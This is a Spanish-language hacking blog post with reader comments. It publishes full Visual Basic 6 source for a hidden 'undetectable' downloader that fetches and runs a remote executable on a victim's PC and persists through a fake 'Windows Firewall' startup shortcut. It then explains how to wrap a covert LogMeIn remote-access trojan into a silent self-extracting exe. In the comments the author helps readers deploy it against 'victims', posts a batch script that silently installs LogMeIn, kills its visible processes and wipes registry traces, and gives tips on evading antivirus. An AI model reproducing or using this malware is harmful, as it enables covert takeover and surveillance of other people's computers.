Downloader en VB INDETECTABLE! –> Complemento para el Troyano con LogMeIn

Downloader en VB.

Este downloader, fue creado con la intencion de utilizarlo con este post, pero cabe aclarar que sirve para cualquier otra aplicacion.

Qué es un Downloader?

Un downloader se utiliza para descargar en la maquina victima un programa pesado, es desir, que ocupa muchos MB entonces se hace imposible camuflarlo para mandarlo por messenger por ejemplo. En general, este “Programa Pesado” es un virus, o un troyano como en el caso nuestro.

Lo que hace es, basicamente, generar un server liviano, (20k) y cuando es ejecutado por la victima, se “instala” secretamente en la maquina y comienza a descargar el archivo, desde la URL que nosotros le hayamos indicado…  cuando la descarga es finalizada, ejecuta el archivo descargado.

Eso es todo.

Comenzamos con el desarrollo de nuestro Downloader

El codigo está escrito en VB, solo hay que pegar el codigo en un Form,  compilar y Listo! no necesita de ningun complemento.

Solo hay que editar 2 lineas, una es la URL de donde se descargara el archivo, y la otra es el Path de destino (donde se guardará) el mismo.

El downloader puede descargar y ejecutar cualquier extension de archivo, siempre y cuando esa extension esté asociada con algun programa en la PC victima. (comando Shell Execute)

Este downloader, al ser ejecutado, guarda un acceso directo al ejecutable del mismo, en la carpeta de inicio del sistema (menu inicio–>programas–>inicio), esto es por si la victima apaga la pc y el archivo no se ha terminado de descargar aun, entonces cuando la vuelva a prender, se comenzara a descargar nuevamente. Una vez terminada la descarga, el acceso directo se elimina.

Este es el codigo fuente del Downloader en VB:

[cc lang=”VB”]

‘declaraciones para ejecutar una vez descargado
Private Declare Function ShellExecute Lib “shell32.dll” Alias “ShellExecuteA” (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Const SW_SHOWNORMAL = 1
‘declaraciones para guardar el archivo ini
Private Declare Function GetPrivateProfileString Lib “kernel32” Alias “GetPrivateProfileStringA” (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long
Private Declare Function WritePrivateProfileString Lib “kernel32” Alias “WritePrivateProfileStringA” (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long
Private Declare Function FileExists Lib “shlwapi.dll” Alias “PathFileExistsA” (ByVal pszPath As String) As Long
‘declaraciones para descargar
Private Declare Function URLDownloadToFile Lib “urlmon” _
Alias “URLDownloadToFileA” _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
‘declaraciones para guardar el acceso directon en el inicio del sistema
Private Declare Function SHGetSpecialFolderLocation Lib “shell32.dll” ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib “shell32.dll” Alias “SHGetPathFromIDListA” ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Private Const CSIDL_STARTUP = &H7
Private Const CSIDL_COMMON_STARTUP = &H18
Dim obj As Object
Dim acceso_directo As Object

Private Sub form_load()
Dim estado As String
Iniciarconwindows
estado = INI_Read(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”)
If Trim(estado) = “Listo!” Then
Quitariniciarconwindows
End
End If
Dim sSourceUrl As String
Dim sDestinationUrl As String

sSourceUrl = “http://www.mipagina.com.ar/lordblacksuca.exe”  ‘ esta es la URL de donde se descarga el archivo
sDestinationUrl = “C:\lordblacksuca.msi”  ‘este es el path donde se va a guardar el archivo

Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Descargando”)
DownloadFile sSourceUrl, sDestinationUrl
Call ShellExecute(Me.hwnd, vbNullString, sDestinationUrl, vbNullString, vbNullString, SW_SHOWNORMAL)
Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Listo!”)
End
End Sub
‘funcion para descargar
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
‘funcion para que el programa inicie cuando se inicia windows
Private Function Iniciarconwindows()
Set obj = CreateObject(“wscript.Shell”)
Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & “\Windows Firewall.lnk”)
With acceso_directo
.TargetPath = App.Path & “\” & App.EXEName
.Save
End With
End Function
Function Quitariniciarconwindows()
If Dir(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”, vbNormal) = “” Then Exit Function
Call Kill(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”)
End Function
‘funcion para escribir y leer de un ini
Public Function INI_Read(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, Optional ByVal Default As String) As String
On Error GoTo ErrOut
Dim Size As Integer
Dim Value As String
‘Comprobamos que el archivo existe:
If Not CBool(FileExists(Filename)) Then Err.Raise 53
‘Se define el tamaño maximo de caracteres
‘que podra tener la variable Value:
Value = Space(256)
‘Se utiliza la función para obtener
‘el valor de la clave:
Size = GetPrivateProfileString(Key_Value, Key_Name, Default, Value, Len(Value), Filename)
‘Si el tamaño es mayor a 0 entonces
‘se ha encontrado el valor de la clave:
If Size > 0 Then
Value = VBA.Left$(Value, Size)
‘Devolvemos el valor de la clave:
If VBA.Right$(VBA.Trim$(Value), 1) = Chr(0) Then Value = VBA.Left$(VBA.Trim$(Value), Len(VBA.Trim$(Value)) – 1)
INI_Read = VBA.Trim$(Value)
Exit Function
End If
ErrOut:
INI_Read = Default
End Function
‘Metodo de escritura. Si el archivo al que se refiere el parametro Filename
‘no existe se crea automaticamente:
Public Sub INI_Write(ByVal Filename As String, ByVal Key_Value As String, ByVal Key_Name As String, ByVal Value As String)
On Error GoTo ErrOut
Dim Size As Integer
‘Escribimos el valor de la clave:
Size = WritePrivateProfileString(Key_Value, Key_Name, Value, Filename)
ErrOut:
End Sub

‘funcion para obtener el path al inicio del sistema
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) – 1)
Exit Function
End If
GetSpecialfolder = “”
End Function

[/cc]

Para que no se gasten en Copiar y Pegar, aca les dejo el Proyecto de Visual Basic para que descargen:

Downloader en VB

Eso fue todo en cuanto al Downloader.


Complementando el Troyano Indetectable con LogMeIn

Como habrán visto, el troyano se compone de 3 archivos. El Instalador Modificado de LogMeIn, el Patch para hacerlo invisible y un archivo .bat, para coordinar todo. Ahora, tenemos que unirlos a todos en un solo .exe

Aclaro en este punto, que existen muchas formas de hacerlo, cualquiera es válida, solo hay que tener una precaución:

Este troyano fue ideado para ejecutarse mediante una Inyección USB por lo tanto habia cosas que no importaban, pero que ahora si, por ejemplo, el archivo ejecutar.bat contiene nuestros datos de acceso a la cuenta de LogMeIn, por lo tanto, si el downloader descarga el archivo, la victima tendria “al alcance de sus manos” nuestros datos, entonces resultariamos nosotros los “hackeados”.

Eso se puede solucionar, convirtiendo el archivo .bat a .exe mediante el programa Bat to Exe Converter de esta forma:

Convertir el .bat a .exe

1º Descargar al archivo:  http://rapidshare.com/files/270764528/DownloaderVB_y_Bat_to_Exe_Converter.rar

2º Seleccionar el archivo .bat a ser convertido.

3º Configurar las opciones ASI:

Opciones de configuración de Bat to Exe Converter
Opciones de configuración de Bat to Exe Converter

4º Apretar Compile y Listo!

Teniendo ese tema solucionado, solo resta unir todos los archivos necesarios para la ejecución.

Para ello, utilizamos el WinRar, y hacemos un archivo SelfExtract invisible, y que al finalizar ejecute el archivo, ejecutar.exe de esta forma:

1º Seleccionar los archivos: ejecutar.exe, el Instalador Modificado de Logmein y el Patch para hacerlo invisible, hacer click derecho sobre uno de ellos y poner Añadir al Archivo… o Add to file… si esta en inglés.  (DEBES tener el WinRar instalado)

2º Seleccionamos Crear un Archivo SFX y Crear un Archivo sólido

Creando el único ejecutable
Creando el único ejecutable

3º En la pestaña Avanzado, hacemos click en Opciones SFX… ahí debemos indicar, que los archivos se extraigan en la misma carpeta y escribimos el nombre del archivo que tiene que ejecutar al finalizar la extracción:

Opciones de SFX
Opciones de SFX

4º En la pestaña Modos, configurar de la siguiente forma:

Opciones SFX "Modos"
Opciones SFX "Modos"

5º Si lo deseas en la pestaña Texto e Icono, puedes seleccionar un icono para el exe final.

6º Apretar en Aceptar y Listo!

Eso fue todo.

Este archivo que hemos creado, es un único archivo .exe, que al ser ejecutado, descomprime los otros archivos en la misma carpeta, y luego ejecuta el archivo llamado ejecutar.exe que es el que inicia todo el proceso de instalacion.

OBIAMENTE, los pasos a seguir, son subir el ultimo archivo creado a un ftp, y apuntar esa URL al downloader, para que este lo descargue y ejecute.

En un próximo post, vemos como hacer para camuflar el server del downloader.

Only for DJs – Invierno 2010 – by DJ Suca
25 June, 2010
Instalar paquetes en versiones viejas de Ubuntu
13 August, 2011
Error: “Interfaz no compatible” en Windows 7 (No such interface supported)
17 April, 2010
95 Comments
  • Reply
    Lordblacksuca
    24 August, 2009 at 12:08 PM

    mou69
    Agosto 24th, 2009 on 11:09 edit

    Uf, tiene buenisima pinta, pero yo al menos me perdi…, no se realmente que hacer con los 3 archivos del downloader una vez que modifico el form…

    al downloader lo compilas y se genera 1 solo exe, que es el downloader propiamente dicho

  • Reply
    mou69
    24 August, 2009 at 12:23 PM

    Bien, con que programa puedo compilarlo? y posteriormente que debo de hacer con el .exe?
    Uf, espero no resultar demasiado pesado. Gracias.

  • Reply
    Lordblacksuca
    24 August, 2009 at 2:51 PM

    lo compilas con el Visual Basic 6.
    por si queres, aca te dejo una version portable
    http://rapidshare.com/files/6603304/Portable_Visual_Basic_6.exe.html

    despues ex exe que generas, es el downloader… es desir se lo tenes que mandar a tu victima para que ésta lo ejecute y el downloader comienze a descargar

  • Reply
    mou69
    24 August, 2009 at 3:59 PM

    Esta bien, gracias por tu paciencia, intentare leer las explicaciones atentamente y seguir los pasos explicados, veremos que sale…, saludos.

  • Reply
    mou69
    24 August, 2009 at 4:31 PM

    Bueno, nada mas comenzar, viene el primer problema,agrego los 3 archivos a la compilacion del proyecto en el visual basic portable y cuando le doy a ejecutar me lanza el siguiente error:

    Error de compilacion:
    Se esperaba: Identificador

    Que hago mal?

  • Reply
    mou69
    24 August, 2009 at 4:49 PM

    Me estoy haciendo la picha un lio con esto de agregar los archivos, puedes explicar como se hace por favor?
    Saludos.

  • Reply
    Lordblacksuca
    25 August, 2009 at 9:45 AM

    deberias decirme en que linea te da el error, porque ami no me aparece

  • Reply
    mou69
    25 August, 2009 at 12:02 PM

    Simplemente agrego el form y posteriormente los otros dos archivos y le doy a ejecutar, sospecho que no los estoy agregando bien…, si no es mucho pedir podrias explicar o colgar algun tutorial que una los dos post, la verdad es que estoy bastante perdido….

  • Reply
    Lordblacksuca
    25 August, 2009 at 2:59 PM

    el problema es que no manejas VB.
    tenes que agregar el form, despues le haces click derecho y view code. y ahi copias el codigo que puse arriba, eso es todo!!! luego, archivo, make proyect1.exe

  • Reply
    mou69
    25 August, 2009 at 3:16 PM

    Lo siento pero no me sale, mucho me temo que me estoy desmoralizando…, podrias hacer una especie de tuto por favor?. Saludos

  • Reply
    Lordblacksuca
    25 August, 2009 at 3:21 PM

    jejeje…. mira, no hay problema te ayudo todo lo que quieras, peeeero, el tutorial esta simple.. seguramente es la primera vez que usas VB.

    hagamos una cosa… decime en donde vas a subir el troyano, entonces yo te hago el downloader

    es decir… desime, donde va a esta tu http://www.tupagina.com/troyano.exe entonces yo te hago el ejecutable que descarge y ejecute ese archivo y te lo paso

  • Reply
    mou69
    25 August, 2009 at 3:46 PM

    ok,existe algun hosting que me recomendarias? o es lo mismo?. Gracias por tu paciencia.

  • Reply
    Lordblacksuca
    25 August, 2009 at 3:48 PM

    es lo mismo cualquiera es lo mismo… yo uso hostings pagos…pero para probar cualquier host gratis sirve

  • Reply
    mou69
    25 August, 2009 at 3:55 PM

    De todas maneras me gustaria aprender ha hacerlo yo mismo… y si, estas en lo cierto es la primera vez que uso VB, tengo la cabeza como un bombo 😉

  • Reply
    Lordblacksuca
    25 August, 2009 at 3:58 PM

    te recomiendo que empieces haciendo algunos hola mundo en VB con algun tuto que encuentres por la red. (hay muuuuchos)

  • Reply
    mou69
    25 August, 2009 at 4:38 PM

    Buenas de nuevo acabo de crear un dominio, es el siguiente:
    http://logincam.webcindario.com
    Espero que sea valido para alojar el troyano…

  • Reply
    mou69
    25 August, 2009 at 4:39 PM

    (Tardan un plazo de 24 horas para darlo de alta)

  • Reply
    Lordblacksuca
    25 August, 2009 at 4:40 PM

    siii.. ahora subi ahi el archivo autoextraible q generas en la segunda parte del post

  • Reply
    mou69
    27 August, 2009 at 5:48 PM

    Hola, al final cree el hosting en http://www.t35.com, me resulto mucho mas practico que webcindario, podrias subir el troyano hay? el hosting es:

    http://logincam.t35.com/

    Saludos.

  • Reply
    Lordblacksuca
    27 August, 2009 at 6:05 PM

    no.. al troyano lo tenes que subir vos, con los datos de conexion a la cuenta… es decir, TODO el archivo autoextraible que generas en la segunda parte del tutorial.

  • Reply
    lord_Plasmaex
    28 August, 2009 at 2:12 AM

    saludos tengo un lijerito problema con el primero troyano y es que en vista no me ejecuta el .bat y me dice el siguiente error LMI_Backdoor_by_Lordblacksuca.msi is not recognized as an internal or external command operable program or batch file.
    instalacion terminada.
    lo mismo con el pacth invisible y si intento ejecutar el msi solo sin el .bat este se ejecuta e instala pero sin los datos de mi cuenta y me da el error de que no se puede vincular con la cuenta.
    porque vista no reconoce los comando del .bat me podrian ayudar
    gracias.

  • Reply
    lord_Plasmaex
    28 August, 2009 at 2:17 AM

    Perdon por si no me explique bien el .bat se ejcuta,
    yo lo ejecuto como administrador por lo de los permisos pero al ejecutarlo es que me sale el error que escribi en el comentario anterior.
    otra cosa en mi caso lo que quiero es solamente que la pc victima que ya tiene el logmein instalado y configurado solo quiero que este mismo se vuelva invisible para que no pueda desactivarlo cuando gusto simplemente que no lo encuentre para desactivarlo y que cuando entre a la pc no aparesca el mensajito que aparece por eso me gusto el que ustedes realizaron ya lo probe en xp y funciona de maravilla incluso cuando lo ejecute en esa pc se reinstalo el que tenia y como quedo con todos los datos que le envie en el .bat solo perdi conexion por un instante y cuando refresque la paguina ya tenia contro de nuevo y esta vez invisible pero para vista no me salio asi para ver que tal la ayudita…

  • Reply
    Lordblacksuca
    28 August, 2009 at 12:58 PM

    hola… lametablemente en vista no lo he probado. siempre lo probe en maquinas con XP.

    el tema del error que te da el bat, es por que no encuentra el comando para ejecutar el instalador… y si ejecutas el instalador manualmente, no te va a servir, porque se instala sin los datos de acceso a la cuenta.

    PARA QUE TE FUNCIONE tenes que reemplazar las lineas en donde se ejecutan los ejecutables… asi:
    START EJECUTABLE.exe
    entones ahi te reconoce el comando

    esto lo tenes que hacer en todos los ejecutables.

    te quedaria asi: (PARA WIN VISTA)

    @echo off
    START LMI_Backdoor_by_Lordblacksuca.msi /quiet USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free

    taskkill /f /IM LogMeInSystray.exe
    taskkill /f /IM LogMeIn.exe

    START logmein-patch.exe

    REG DELETE HKEY_CLASSES_ROOT\Installer\Products\675138F764267C245B32553B9F5690CC /f
    exit

    HAY OTRA COSA MAS
    he notado que en algunas PCs hay diferencias en el comando taskkill tskill es desir… en maquinas con vista.. el taskkill funciona perfectamente, pero en xp aveces no. todavia no he encontrado el porque. pero igual la solucion es usar tskill

  • Reply
    mou69
    29 August, 2009 at 9:46 AM

    He probado con los hostings webcindario, t35, runhosting, lycos y alguno mas…, y no me deja subir el archivo al pesar este 10 MG, a ver si me podeis recomendar alguno por favor. Gracias y saludos para tod@s.

  • Reply
    Lordblacksuca
    29 August, 2009 at 3:15 PM

    OK, jaja Hostings hay millloooones, mira:
    http://www.google.com.ar/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=%20hosting+gratuito

    podes usar este:
    http://www.unlugar.com/hostinggratis/info_servicios/hosting_gratis.asp

  • Reply
    mou69
    30 August, 2009 at 11:58 AM

    hola, he estado mirando y se que hay miles de hostings, pero que sean gratuitos y dejen alojar un archivo de 10 MG no encontre ninguno, tampoco http://www.unlugar.com, saludos.

  • Reply
    SoDark
    31 August, 2009 at 7:39 AM

    La solucion no pasa por usar TSKILL lo estubo probando un colega y no funcionaba bien, el problema lo encontrareis en los Windows XP Home Edition que no tienen el comando TASKKILL.

    Solucion? En el pack de archivos incluir el TASKILL.exe del windows XP Profesional que encontrareis en Windows\system32 y copiarlo en Windows\System32 del Windows XP Home Edition, almenos es como lo he hecho yo y funciona perfectamente. Obviamente sera lo primero que debais hacer antes de poner a instalar el logmein y matar procesos.

  • Reply
    Daniel
    1 September, 2009 at 1:22 AM

    Ojo que todos los convertidores de bat a exe en realidad no compilan sino que guardan el bat dentro del exe y al ejecutarlo copian el bat original a una
    carpeta temporal y lo ejecuta de ahi, solo que le cambia el nombre (ej hsf7sf7.bat) , al terminar la instalacion lo elimina. aun asi es muy peligroso ya que alguien con un poco de conocimientos puede encontrar el bat y ver todos los datos que usamos( cuenta de logmein y contraseña de los equipos en el que esta instalado). lo digo porque ya lo verifique
    con varios convertidores BAT to EXE.

    • Reply
      Lordblacksuca
      1 September, 2009 at 7:06 AM

      tenes toda la razon. alguna idea de como solucionarlo?
      como dije en el post, estaba todo pensado para una inyeccion usb, en donde TODO queda en nuestro pendrive.

  • Reply
    M1n0s
    15 October, 2009 at 2:16 AM

    estimado señor Lordblacksuca…

    estoy programando su archivo BAT, ya que me es supremamente facil pasarlo a EXE, en cuanto este listo le mandare el link de descarga… y me gustaria que tuvieramos una charla privada…

    Att. M1n0s

    • Reply
      Lordblacksuca
      15 October, 2009 at 6:41 AM

      Hola.
      Te estoy mandando un mail, para ponernos en contacto.

  • Reply
    Troyano con LogMeIn –> Actualización a la versión 4.0.0.966 | Lordblacksuca
    26 October, 2009 at 12:36 PM

    […] En el paquete de descarga, no encontraran el downloader, porque éste funciona perfectamente como está explicado aqui. […]

  • Reply
    julian
    27 October, 2009 at 5:40 PM

    viejo, hay muchas lineas de codigo que subraya, porque?, por ejemplo serian
    -Private Const CSIDL_STARTUP = &H7
    -Private Const CSIDL_COMMON_STARTUP = &H18
    -estado = INI_Read(App.Path& “\FirewallOptions.ini”, “Estado”, “Update”)
    -Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Descargando”)
    Call INI_Write(App.Path & “\FirewallOptions.ini”, “Estado”, “Update”, “Listo!”)
    Set acceso_directo = obj.CreateShortcut(GetSpecialfolder(CSIDL_STARTUP) & “\Windows Firewall.lnk”)
    .TargetPath = App.Path & “\” & App.EXEName
    If Dir(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”, vbNormal) = “” Then Exit Function
    Call Kill(GetSpecialfolder(CSIDL_STARTUP) & “\Comodin.lnk”)
    If Size > 0 Then

    psdata, el link ke dejaste con el codigo de vb esta erroneo abre es el de descarga para pasar de .bat a .exe

  • Reply
    Lordblacksuca
    27 October, 2009 at 6:13 PM

    Hola, primero… esta todo en el mismo rar. lo que me estas mostrando, es parte del codigo, por lo que lo debes tener.

    con respecto a tu duda, la parte que me estas mostrando, es la que hace que si la victima apaga la pc antes de que se termine de descargar, al iniciar la pc de nuevo, comienze la descarga… al terminar… no se inicia mas.

    no se porque te da el error, no deberia hacerlo. Estas en Visual Basic 6?

  • Reply
    julian
    27 October, 2009 at 6:37 PM

    si estoy trabajando en visual basic 6 y son todas esas lineas las ke me subraya, aparte de eso le doy compilar y me aparece error de compilacion: se esperaba: expresion, y me subraya el &,,,

  • Reply
    julian
    27 October, 2009 at 6:38 PM

    de casualidad no lo tienes para eclipse?

  • Reply
    julian
    27 October, 2009 at 6:45 PM

    a ya coji el del archivo .rar, ahi si lo abri y ese esta bueno… muchas gracias!!, a otra curiosidad donde dice la ruta de la patch, es donde le va a quedar instalado a la victima o un archivo ke se genera y queda guardado en mi computador…

  • Reply
    Lordblacksuca
    27 October, 2009 at 8:45 PM

    bueno, ahora entiendo lo que pasaba… tu copiaste el codigo de la web y lo pusiste en un nuevo proyecto de VB… claro… te tiraba los errores porque no estaban cargados los complementos ni referencias necesarias.

    donde dice la ruta…. es donde se va a descargar en la pc victima… por lo general te recomiendo que sea en una ubicacion donde windows te permita escribir.

  • Reply
    toro
    27 October, 2009 at 10:45 PM

    dejo de crear el archivo .exe, que puede estar pasando, si se instalo como lo elimino?, el archivo que habia creado anteriormente lo elimine, y ahora quiero crearlo y no lo hace, muestra como si compilara pero no crea el archivo

  • Reply
    toro
    27 October, 2009 at 10:54 PM

    solo me esta creando lo sienguiente
    FirewallOptions.ini
    no se crea el ejecutable para mandar… cual podria ser el motivo.

  • Reply
    toro
    27 October, 2009 at 10:58 PM

    cuando aparecio el .exe ocurria lo siguiente
    subsistema MS-DOS de 16b:
    c:\docume…..
    la CPU NTVDM ha encontrado una instruccion no permitida.
    CS:075 a IP:011d OP: 2e 63 6f 6d 20 Elija “cerrar” para finalizar la aplicación.
    cerrar<<<>>omitir,

    le di omitir, y se quedo la ventana de DOS activa con el _ rebotando por todos lados, por esto lo elimine, ahora lo quiero volver a crear y no deja.

  • Reply
    Lordblacksuca
    27 October, 2009 at 11:12 PM

    bueno… lamentablemente te debo decir que tienes algun problema en tu pc.

    visual basic anda en xp y vista el 100% de los casos.
    si ves que la barra de copilacion carga al 100 entonces COMPILA… jejeje no se donde guardas el exe. ahhh quizas… aunque no creo que funcione, porque es indetectable…. proba desactivar el antivirus

    te recomiendo que depures bien el codigo para saber en que linea te da el error.

    ahh, y te pido una cosa…. bien de onda… por favor, escribe todas tus inquietudes en un solo comenario, no es necesario uno por cada pregunta, asi es más dificil leerlos.

  • Reply
    toro
    28 October, 2009 at 12:52 AM

    disculpame, esque las dudas se me surgen cuando sigo trabajando, igual muchas gracias, ps lo ejecute desde un computador con vista y creo un .exe espero que ese funcione, porque lo hice desde otro xp y no creaba el ejecutable, no se por que, mi ultima duda es como se si esta descargando el archivo, o cuando llego, y manejo el computador remoto con el logmein que tu dejaste modificado,

  • Reply
    Lordblacksuca
    28 October, 2009 at 6:33 AM

    bueno, como el downloader es totalmente invisible…. no hay forma de ver el progreso, sin embargo, te puedes fijar en el archivo firewalloptions.ini, que es en donde dice si termino o no.

    y la idea es esa, que cuando vayas a tu casa, puedas entrar directamente.

  • Reply
    toro
    29 October, 2009 at 12:54 AM

    oye, osea que requiero estar en el computador de la victima descargar el VB, luego darle compilar, y ahora si irme…?? no hay posibilidad de crear un .exe que solo sea enviar y haga esas cosas?

  • Reply
    Lordblacksuca
    29 October, 2009 at 2:00 AM

    noooooo!!!…. que sentido podria tener eso? please!! jejeje.

    cuando tengas TU ejecutable…. eso es lo unico que le tenes que mandar a tu victima, para que esta lo ejecute y listo.

  • Reply
    toro
    29 October, 2009 at 11:25 AM

    el archivo me esta descargando perfectamente, creo “que lo esta ejecutando al descargar(no estoy bn seguro de esta parte, porque lo utilize en mi casa, y se donde descargo creo que se ejecuto y dejo visible los archivos.)”, el otro problema que encuentro es que lo estube utilizando con un amigo a el le dije que lo bajara de la pagina de descarga, y ejecutara el archivo, el me dijo que le aparecio con un spyware donde iba a quedar alojado el programa, me dijo que el programa aparecio activo, pero hay un problema yo entro a la pagina de logmein, y el pc de el no aparece registrado. le doy actualizar y aun asi no sucede… que puede estar sucediendo?

  • Reply
    Lordblacksuca
    29 October, 2009 at 1:39 PM

    bien, lo que puede estar pasando con tu amigo, es que algunos firewall o antispyware, detectan a logmein como un spyware, y le bloquean la salida de datos.

    te propongo lo siguiente: prueba el downloader, para que te descargue cualquier cosa en tu pc, una imagen..lo que sea. ejecutalo, y comproba que compilaste bien, es decir, fijate si la imagen o lo que fuere, se descargó bien.

    por otro lado, bajate el troyano con logmein ultima version, y probalo solo… en tu mauqina si queres tqambien puede ser.

    cuando te asegures que ambas partes funcionen, a TU modo, ya estas listo, para realizar lo que quieras.

  • Reply
    Renato123
    19 November, 2009 at 7:58 PM

    Ola una duda lo puedo hacer en visual estudio.net esq solo ese tengo y el link del vb 6 portable no funciona.. agradeceria su respuesta…

  • Reply
    Lordblacksuca
    19 November, 2009 at 8:51 PM

    Hola, sinceramente te pido disculpas. No uso visual studio.net

    sin embargo, tengo entendido, que solo hay unas diferencias en cuanto a declaracion y parametros de funciones y otras cosas mas.

    deberias probar, a ver que pasa.

    cualquier cosa, aca te dejo otro link para el VB6 portable http://www.megaupload.com/?d=PRMUAWXB

  • Reply
    Renato123
    19 November, 2009 at 9:17 PM

    muchas gracias ia con vb 6 si esta.. ahora tengo un problema me cree en hosting en miarroba y ia cree un arhicho .exe kiero subirlo pero no puedo como puedo hacer ..:( ayudame

  • Reply
    Lordblacksuca
    19 November, 2009 at 9:25 PM

    tenes que usar algun cliente FTP como el filezilla por ejemplo.

    pero esos hostings seguro que te ofrecen una aplicacion web para subir archivos. busca en alguna parte que diga algo de upload o file manager

  • Reply
    Renato123
    19 November, 2009 at 10:24 PM

    si eso si sale osea lo pongo para cargar y naa me bota un error talvez no acepta archivos .exe no se..:S (disculpa si no fui claro..)

  • Reply
    Lordblacksuca
    19 November, 2009 at 10:30 PM

    mmm….as a tener que probar con otro hosting entonces.

  • Reply
    Renato123
    19 November, 2009 at 11:39 PM

    Ia buzke y nada creo q se me va a ser imposible usar este metodo..:(..si encuentras algo t agradeceria q me comunicaras..gracias x tu tiempo

  • Reply
    Renato123
    22 November, 2009 at 11:11 PM

    Subi el exe a mediafire.. y lo intento jalar con el dowloader y naa no me sale ningun error pero no pasa nada..:s q puedo estar haciendo mal?? ayuda xfa

  • Reply
    Lordblacksuca
    23 November, 2009 at 5:00 AM

    no… por favor. mediafire es un servidor de descargas, pero no tienes descarga directa al archivo, lo que necesitas es un hosting, mediante el cual puedas acceder al archivo en descarga directa. http://www.tuhost.com/archivo.exe

    PONE en google: Hosting Gratis

    vas a tener miles de resultados en donde vas a poder tener hosting gratuito.

    con miles, me refiero a MUCHISIMOS.

  • Reply
    Pelax
    24 November, 2009 at 9:24 PM

    Hola me funciono exelente el downloader ya lo probe en mi maquina virtual y andubo de 10 gracias era lo q necesitaba ver como funcionaba en dowloader en VB.
    cualquier problema q encuentre te la hago saber.

    gracias

    • Reply
      Lordblacksuca
      25 November, 2009 at 12:38 PM

      De nada! me alegra que te guste el downloader.

      Recuerda, siempre, tienes que hacer una sola descarga dentro del codigo, si haces mas de una, los AV te detectan

  • Reply
    andres
    22 December, 2009 at 4:29 PM

    Hola Lordblacksuca te cuento que ya descargue el archivo del Downloader y también el programa visual basic. Pero no tengo mucho cono cimiento sobre el programa, el dowloader son 3 archivos y uno abre con el vb ya le modifique las dos líneas la URL de donde se descargara el archivo, y la otra es el Path de destino pero no se después que debo hacer o como se guarda o con que extensión y tampoco sé como mandárselo a la víctima ..
    Te agradezco tu colaboración y espero tu respuesta.
    Gracias.

  • Reply
    Lordblacksuca
    22 December, 2009 at 6:21 PM

    cuando hayas modificado las lineas necesarias en el codigo fuente, tenes que compilar… Archivo –> Generar ejecutable o si esta en ingles File–> Make exe

    ese archivo que generes tenes que mandar

  • Reply
    andres
    23 December, 2009 at 2:27 PM

    Gracias Lordblacksuca por la explicación.

    Qué pena molestarte de nuevo pero tengo dos preguntas.

    1 ¿cómo puedo cambiar el icono del ejecutable que voy a mandar a la víctima?

    2 ¿el archivo para la descargar lo estoy subiendo en el hosting http://www.zymic.com pero no recibe .exe cual me recomiendas y que sea gratuito?
    Gracias

  • Reply
    Lordblacksuca
    23 December, 2009 at 3:22 PM

    1) para cambiar el icono, tenes que cargarle un icono al Form. si te fijas en el panel de propiedades de VB, cuando seleccionas Form1 aparece una propiedad que se llama icon, seleccionas un icono y listo.

    2) hay muchos hostings, yo uso hostings pagos, pero proba con freexa.com freewebtown.com etc etc

  • Reply
    msl8902
    4 January, 2010 at 5:50 PM

    alguien q recomiendde un buen host para subir el .exe

  • Reply
    msl8902
    4 January, 2010 at 11:03 PM

    alguien q me recomiende un host gratis para poder subir el ejecutable xq pesa 14MB y los host q consigo dejan descargar un maximo de 10MB

  • Reply
    msl8902
    5 January, 2010 at 1:53 AM

    Lordblacksuca como se yo cuando se esta descargando el ejecutable? yo lo stoy probando en mi mismo dandole click al resultado de compilar pero pero yo no veo que se descarga nada en la carpeta de destino. sera que hice algo mal men.?

  • Reply
    Lordblacksuca
    5 January, 2010 at 10:02 AM

    no hay forma de saberlo! solo hasta cuando se termina de descargar.

  • Reply
    furian
    24 January, 2010 at 5:35 PM

    Hola en primer lugar muchísimas gracias por el troyano, te comento que no puedo bajar el archivo de rapidshare ya van 3 dias que trato pero rapidshare me sigue diciendo que no hay slots disponibles que trate en 2 minutos y ya trate varias veces te pido por favor que subas el programa hecho en visual basic al megaupload please!!! GRACIAS XD!!

  • Reply
    Lordblacksuca
    24 January, 2010 at 8:28 PM

    aca te dejo el link en descarga directa desde el sitio:

    http://www.diegosucaria.info/DownloaderVB y Bat to Exe Converter.rar

    recuerda pasarte por la ultima version del troyano:
    http://www.diegosucaria.info/troyano-con-logmein-actualizacion-a-la-version-4-0-0-966/

    y tambien por mi foro: http://www.underhack.net

    saludos!

  • Reply
    furian
    25 January, 2010 at 2:04 PM

